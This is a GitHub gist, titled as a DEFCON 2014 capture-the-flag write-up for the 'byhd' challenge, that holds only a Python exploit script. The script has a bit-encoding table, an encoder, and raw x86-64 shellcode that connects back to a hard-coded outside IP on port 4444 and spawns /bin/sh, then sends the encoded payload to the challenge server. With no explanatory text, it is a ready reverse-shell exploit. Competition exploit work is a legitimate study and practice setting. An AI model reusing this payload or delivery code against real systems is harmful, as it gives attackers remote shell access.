Create a gist now

Instantly share code, notes, and snippets.

What would you like to do?
DEFCON 2014 Writeup byhd
from socket import *
from struct import pack
dic = {0: [0], 1: [1, 0, 0, 1, 1, 1], 2: [1, 1, 0, 1, 1, 1, 0], 3: [1, 1, 0, 0, 0, 0, 0, 0], 4: [1, 1, 1, 1, 0, 0, 0, 1, 1], 5: [1, 1, 1, 1, 1, 0, 1, 0, 1, 1], 6: [1, 1, 1, 1, 1, 0, 0, 1, 1], 7: [1, 0, 0, 1, 0, 0, 1], 8: [1, 1, 1, 0, 0, 0, 1, 1], 9: [1, 0, 1, 1, 1, 0, 0, 0, 0, 1], 10: [1, 0, 1, 1, 1, 1, 0, 1, 1], 11: [1, 1, 0, 0, 1, 0, 0, 0, 1, 1, 1], 12: [1, 1, 0, 0, 1, 0, 1, 1, 1], 13: [1, 0, 1, 0, 0, 1, 1, 0, 1], 14: [1, 1, 1, 0, 1, 0, 0, 1, 1], 15: [1, 1, 1, 0, 0, 0, 0, 1], 16: [1, 1, 1, 0, 0, 0, 1, 0], 17: [1, 1, 1, 0, 0, 0, 0, 0, 1, 1], 18: [1, 1, 1, 1, 1, 0, 1, 1, 1], 19: [1, 1, 1, 0, 1, 0, 0, 0, 0, 0, 0, 1], 20: [1, 1, 1, 0, 1, 0, 0, 1, 0], 21: [1, 1, 0, 0, 1, 0, 0, 0, 1, 1, 0], 22: [1, 1, 1, 0, 1, 0, 1, 0, 0, 0, 1, 1], 23: [1, 1, 1, 0, 1, 0, 1, 0, 0, 0, 1, 0], 24: [1, 0, 1, 0, 0, 1, 1, 1, 1], 25: [1, 0, 1, 1, 1, 0, 0, 1, 0, 0, 1], 26: [1, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1], 27: [1, 1, 1, 0, 1, 0, 0, 0, 0, 0, 1], 28: [1, 1, 0, 0, 0, 1, 1, 1, 1], 29: [1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1], 30: [1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1], 31: [1, 0, 1, 0, 0, 1, 1, 0, 0, 1], 32: [1, 0, 1, 1, 1, 0, 1], 33: [1, 0, 0, 1, 1, 0, 0, 0, 1, 0, 1], 34: [1, 1, 0, 0, 0, 0, 0, 1, 0, 1], 35: [1, 1, 0, 0, 1, 0, 0, 0, 0, 1, 1, 1], 36: [1, 0, 1, 0, 1, 0, 1, 0, 1], 37: [1, 0, 1, 0, 1, 1, 1, 1], 38: [1, 0, 1, 1, 1, 0, 0, 1, 0, 0, 0], 39: [1, 1, 1, 1, 0, 0, 0, 1, 0, 0, 1, 1, 1], 40: [1, 0, 0, 1, 0, 1, 1, 1, 1], 41: [1, 1, 1, 0, 1, 0, 0, 0, 0, 1], 42: [1, 0, 1, 0, 1, 0, 0, 1, 1, 0, 1], 43: [1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1], 44: [1, 0, 1, 1, 1, 1, 0, 0, 1, 1, 1], 45: [1, 1, 1, 1, 1, 0, 1, 1, 0, 1], 46: [1, 0, 1, 1, 0, 0, 1, 0], 47: [1, 1, 1, 0, 0, 0, 0, 0, 0, 1, 0], 48: [1, 1, 1, 1, 1, 0, 0, 0, 1], 49: [1, 1, 1, 0, 1, 0, 1, 1, 1, 1], 50: [1, 0, 1, 0, 1, 0, 0, 1, 1, 0, 0], 51: [1, 0, 0, 1, 1, 0, 0, 0, 1, 0, 0], 52: [1, 0, 1, 1, 1, 1, 1, 0, 0, 1], 53: [1, 0, 1, 0, 1, 0, 1, 0, 0, 1, 0, 0, 1], 54: [1, 0, 1, 0, 1, 0, 0, 1, 0, 1, 1], 55: [1, 1, 1, 0, 1, 0, 1, 0, 0, 0, 0, 1], 56: [1, 0, 0, 1, 0, 0, 0, 0, 0, 1], 57: [1, 0, 1, 1, 1, 1, 0, 0, 1, 1, 0], 58: [1, 0, 1, 1, 1, 1, 0, 0, 1, 0, 1], 59: [1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1], 60: [1, 1, 1, 1, 0, 0, 0, 1, 0, 0, 1, 1, 0], 61: [1, 1, 0, 0, 1, 0, 0, 0, 0, 1, 1, 0], 62: [1, 1, 1, 0, 1, 0, 1, 1, 1, 0], 63: [1, 0, 1, 1, 1, 1, 0, 0, 1, 0, 0], 64: [1, 1, 1, 0, 0, 1, 1], 65: [1, 1, 0, 0, 0, 1, 0, 1], 66: [1, 0, 1, 1, 1, 1, 0, 0, 0, 1, 1], 67: [1, 1, 0, 0, 0, 1, 1, 1, 0], 68: [1, 0, 1, 1, 1, 1, 1, 0, 1, 1], 69: [1, 1, 1, 1, 1, 1], 70: [1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0], 71: [1, 0, 1, 1, 1, 1, 0, 0, 0, 1, 0], 72: [1, 1, 0, 1, 0], 73: [1, 0, 1, 0, 0, 0, 1, 0, 1, 1], 74: [1, 0, 0, 1, 1, 0, 0, 0, 0, 1, 1], 75: [1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1], 76: [1, 1, 0, 0, 1, 0, 0, 1, 0, 1], 77: [1, 0, 1, 1, 1, 1, 1, 0, 1, 0], 78: [1, 1, 0, 0, 1, 0, 0, 0, 0, 1, 0, 1], 79: [1, 0, 1, 0, 1, 1, 1, 0, 0, 1], 80: [1, 0, 1, 0, 1, 1, 1, 0, 1], 81: [1, 0, 1, 0, 1, 1, 1, 0, 0, 0, 1, 0, 0, 1], 82: [1, 0, 0, 1, 1, 0, 1, 1], 83: [1, 1, 1, 0, 1, 0, 1, 0, 0, 1, 1], 84: [1, 1, 0, 1, 1, 1, 1, 1, 0, 1], 85: [1, 1, 0, 0, 0, 1, 0, 0], 86: [1, 0, 1, 0, 1, 0, 0, 0, 1, 0, 1, 1], 87: [1, 0, 1, 0, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0], 88: [1, 0, 1, 1, 0, 0, 0, 0, 0, 1], 89: [1, 0, 1, 0, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1], 90: [1, 0, 1, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0], 91: [1, 0, 1, 0, 0, 1, 0, 0, 1], 92: [1, 0, 1, 1, 1, 1, 0, 0, 0, 0, 1], 93: [1, 0, 1, 1, 1, 0, 0, 1, 1], 94: [1, 0, 1, 0, 1, 0, 0, 0, 1, 0, 1, 0], 95: [1, 0, 1, 1, 0, 0, 0, 0, 1], 96: [1, 1, 0, 1, 1, 0, 0, 1], 97: [1, 0, 0, 1, 0, 1, 0, 1], 98: [1, 1, 0, 1, 1, 0, 1, 0, 0, 1], 99: [1, 1, 1, 1, 1, 0, 1, 0, 1, 0], 100: [1, 0, 1, 1, 0, 0, 0, 1], 101: [1, 1, 1, 1, 0, 0, 1, 1], 102: [1, 1, 0, 0, 1, 0, 1, 1, 0], 103: [1, 0, 1, 1, 1, 0, 0, 0, 1], 104: [1, 0, 1, 0, 1, 0, 1, 1], 105: [1, 1, 0, 0, 1, 1, 1, 1], 106: [1, 0, 1, 0, 1, 0, 0, 0, 1, 0, 0, 1], 107: [1, 0, 1, 0, 1, 0, 0, 1, 0, 1, 0], 108: [1, 1, 1, 0, 1, 0, 0, 0, 1], 109: [1, 1, 1, 0, 1, 0, 1, 1, 0, 1], 110: [1, 1, 1, 1, 0, 0, 1, 0, 1], 111: [1, 1, 0, 1, 1, 0, 0, 0, 1], 112: [1, 0, 0, 1, 0, 1, 1, 1, 0], 113: [1, 1, 1, 1, 0, 0, 0, 1, 0, 0, 1, 0, 1], 114: [1, 0, 0, 1, 0, 0, 0, 1], 115: [1, 0, 1, 0, 0, 0, 1, 1], 116: [1, 0, 1, 0, 1, 1, 0], 117: [1, 1, 1, 0, 0, 1, 0, 1], 118: [1, 0, 1, 0, 0, 0, 1, 0, 1, 0], 119: [1, 0, 0, 1, 1, 0, 0, 0, 0, 1, 0], 120: [1, 1, 1, 0, 1, 0, 1, 1, 0, 0], 121: [1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 1], 122: [1, 1, 1, 0, 1, 0, 1, 0, 0, 0, 0, 0], 123: [1, 0, 1, 0, 1, 0, 0, 0, 1, 0, 0, 0], 124: [1, 0, 1, 0, 1, 0, 0, 1, 0, 0, 1], 125: [1, 1, 1, 0, 0, 1, 0, 0], 126: [1, 1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1], 127: [1, 1, 0, 0, 1, 0, 0, 0, 1, 0, 1], 128: [1, 0, 1, 0, 0, 1, 1, 1, 0, 1], 129: [1, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1], 130: [1, 1, 1, 1, 0, 0, 0, 1, 0, 0, 1, 0, 0], 131: [1, 1, 0, 0, 0, 0, 1], 132: [1, 0, 0, 1, 0, 1, 1, 0, 1], 133: [1, 0, 0, 1, 0, 1, 0, 0], 134: [1, 0, 1, 0, 0, 1, 0, 0, 0], 135: [1, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 1, 1], 136: [1, 0, 1, 0, 0, 0, 1, 0, 0, 1], 137: [1, 1, 1, 1, 0, 1], 138: [1, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0], 139: [1, 1, 1, 0, 1, 1], 140: [1, 1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 0], 141: [1, 0, 1, 0, 0, 0, 0, 1], 142: [1, 0, 1, 0, 1, 0, 1, 0, 0, 0, 1, 1, 1], 143: [1, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0], 144: [1, 1, 0, 1, 1, 0, 0, 0, 0], 145: [1, 0, 1, 0, 1, 0, 1, 0, 0, 0, 1, 1, 0], 146: [1, 0, 1, 0, 1, 0, 0, 0, 0, 1, 1, 1], 147: [1, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 1], 148: [1, 1, 1, 1, 0, 0, 0, 0, 0, 1, 0, 1], 149: [1, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0], 150: [1, 1, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0], 151: [1, 0, 1, 0, 1, 1, 1, 0, 0, 0, 0, 1, 1, 0], 152: [1, 0, 1, 0, 0, 0, 1, 0, 0, 0], 153: [1, 0, 1, 0, 1, 0, 1, 0, 0, 0, 1, 0, 1], 154: [1, 0, 1, 0, 1, 0, 0, 0, 0, 1, 1, 0], 155: [1, 0, 1, 0, 1, 0, 1, 0, 0, 0, 1, 0, 0], 156: [1, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0], 157: [1, 0, 1, 0, 1, 1, 1, 0, 0, 0, 0, 1, 0, 1], 158: [1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1], 159: [1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1], 160: [1, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0], 161: [1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 1, 0], 162: [1, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 1, 1], 163: [1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1], 164: [1, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 1, 0], 165: [1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0], 166: [1, 0, 1, 0, 1, 0, 0, 0, 0, 1, 0, 1], 167: [1, 0, 1, 0, 1, 0, 0, 0, 0, 1, 0, 0], 168: [1, 1, 0, 0, 1, 0, 0, 1, 0, 0], 169: [1, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 1], 170: [1, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0], 171: [1, 0, 1, 0, 1, 1, 1, 0, 0, 0, 1, 1, 1], 172: [1, 0, 0, 1, 1, 0, 0, 1, 1, 1], 173: [1, 0, 1, 0, 1, 1, 1, 0, 0, 0, 0, 1, 0, 0], 174: [1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 1, 1], 175: [1, 0, 1, 0, 1, 1, 1, 0, 0, 0, 0, 0, 1, 1], 176: [1, 1, 1, 1, 1, 0, 1, 0, 0, 0, 1], 177: [1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1], 178: [1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 1, 0], 179: [1, 0, 1, 0, 1, 1, 1, 0, 0, 0, 0, 0, 1, 0], 180: [1, 0, 0, 1, 1, 0, 0, 1, 1, 0], 181: [1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 1], 182: [1, 1, 1, 0, 1, 0, 1, 0, 1, 1], 183: [1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0], 184: [1, 1, 0, 1, 1, 1, 1, 0], 185: [1, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0], 186: [1, 1, 1, 1, 0, 0, 0, 1, 0, 1], 187: [1, 0, 1, 0, 0, 1, 1, 1, 0, 0], 188: [1, 1, 1, 1, 0, 0, 1, 0, 0, 1], 189: [1, 1, 0, 0, 1, 0, 0, 0, 0, 0, 1, 1], 190: [1, 1, 1, 1, 1, 0, 1, 1, 0, 0], 191: [1, 1, 0, 0, 0, 0, 0, 1, 1], 192: [1, 0, 1, 1, 0, 0, 1, 1], 193: [1, 1, 0, 1, 1, 1, 1, 1, 0, 0], 194: [1, 0, 1, 0, 0, 0, 0, 0, 1], 195: [1, 1, 0, 1, 1, 0, 1, 0, 1], 196: [1, 1, 1, 1, 1, 0, 1, 0, 0, 1], 197: [1, 1, 1, 1, 0, 0, 1, 0, 0, 0], 198: [1, 1, 1, 1, 1, 0, 0, 0, 0, 1], 199: [1, 1, 0, 0, 1, 1, 0], 200: [1, 1, 0, 1, 1, 1, 1, 1, 1], 201: [1, 0, 0, 1, 1, 0, 0, 1, 0, 1], 202: [1, 0, 1, 0, 0, 0, 0, 0, 0, 1, 1], 203: [1, 0, 1, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 1], 204: [1, 0, 1, 0, 1, 0, 0, 1, 1, 1], 205: [1, 0, 1, 0, 1, 1, 1, 0, 0, 0, 1, 1, 0], 206: [1, 1, 1, 0, 1, 0, 1, 0, 1, 0], 207: [1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 208: [1, 1, 0, 0, 1, 0, 1, 0], 209: [1, 0, 1, 0, 1, 0, 0, 0, 1, 1, 1], 210: [1, 1, 1, 1, 0, 0, 0, 0, 0, 1, 0, 0], 211: [1, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0], 212: [1, 0, 0, 1, 1, 0, 0, 1, 0, 0], 213: [1, 0, 1, 0, 1, 1, 1, 0, 0, 0, 1, 0, 1], 214: [1, 0, 0, 1, 1, 0, 0, 0, 1, 1], 215: [1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0], 216: [1, 0, 1, 1, 1, 1, 1, 1], 217: [1, 0, 1, 0, 1, 0, 1, 0, 0, 1, 1, 1], 218: [1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1], 219: [1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1], 220: [1, 0, 0, 1, 0, 0, 0, 0, 1], 221: [1, 0, 1, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0], 222: [1, 0, 1, 0, 1, 0, 1, 0, 0, 1, 1, 0], 223: [1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 1, 0], 224: [1, 1, 0, 1, 1, 0, 1, 1], 225: [1, 0, 1, 0, 1, 0, 1, 0, 0, 1, 0, 1], 226: [1, 0, 1, 1, 1, 1, 1, 0, 0, 0, 1], 227: [1, 1, 1, 0, 0, 0, 0, 0, 1, 0, 1], 228: [1, 1, 0, 0, 1, 0, 0, 1, 1], 229: [1, 1, 1, 1, 0, 0, 0, 0, 1], 230: [1, 0, 1, 1, 0, 0, 0, 0, 0, 0], 231: [1, 0, 1, 0, 1, 0, 0, 0, 1, 1, 0], 232: [1, 0, 1, 1, 0, 1], 233: [1, 1, 0, 0, 1, 1, 1, 0], 234: [1, 0, 1, 1, 1, 0, 0, 0, 0, 0], 235: [1, 1, 0, 0, 0, 1, 1, 0], 236: [1, 1, 1, 1, 1, 0, 0, 1, 0], 237: [1, 1, 1, 1, 1, 0, 1, 0, 0, 0, 0], 238: [1, 1, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0], 239: [1, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1], 240: [1, 0, 1, 1, 1, 1, 0, 1, 0], 241: [1, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0], 242: [1, 1, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0], 243: [1, 0, 1, 1, 1, 0, 0, 1, 0, 1], 244: [1, 1, 0, 0, 0, 0, 0, 1, 0, 0], 245: [1, 1, 1, 0, 1, 0, 1, 0, 0, 1, 0], 246: [1, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0], 247: [1, 0, 1, 0, 0, 1, 1, 0, 0, 0], 248: [1, 0, 0, 1, 1, 0, 1, 0], 249: [1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1], 250: [1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0], 251: [1, 1, 1, 0, 0, 0, 0, 0, 1, 0, 0], 252: [1, 0, 1, 0, 0, 1, 0, 1], 253: [1, 1, 0, 1, 1, 0, 1, 0, 0, 0], 254: [1, 0, 0, 1, 0, 1, 1, 0, 0], 255: [1, 0, 0, 0]}
def encode(shellcode):
bits = []
encoded = ""
for i in shellcode:
bits += dic[ord(i)]
for i in range(0, len(bits), 8):
byte = 0
for j in range(len(bits[i:i+8])):
byte += (bits[i:i+8][j] << (7-j))
encoded += chr(byte)
print bits
return encoded
sendee = "\x48\x31\xed\x6a\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x50\x5f\x55\xbb\xb4\x1a\x3a\x80\x48\xc1\xe3\x20\x66\xb8\x11\x5c\xc1\xe0\x10\xb0\x02\x48\x09\xd8\x50\x54\x5e\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x6a\x02\x5e\x6a\x21\x58\x0f\x05\x48\xff\xce\x79\xf6\x55\x55\x5e\x5a\x55\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x0f\x05"
shellcode = encode(sendee)
assert(len(shellcode) <= 0x100)
print [shellcode]
p = socket(AF_INET, SOCK_STREAM)
#p.connect(("192.168.174.219", 9730))
p.connect(("byhd_147e0accdae13428910e909704b21b11.2014.shallweplayaga.me", 9730))
p.send(pack("<I", len(shellcode)))
p.send(shellcode)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment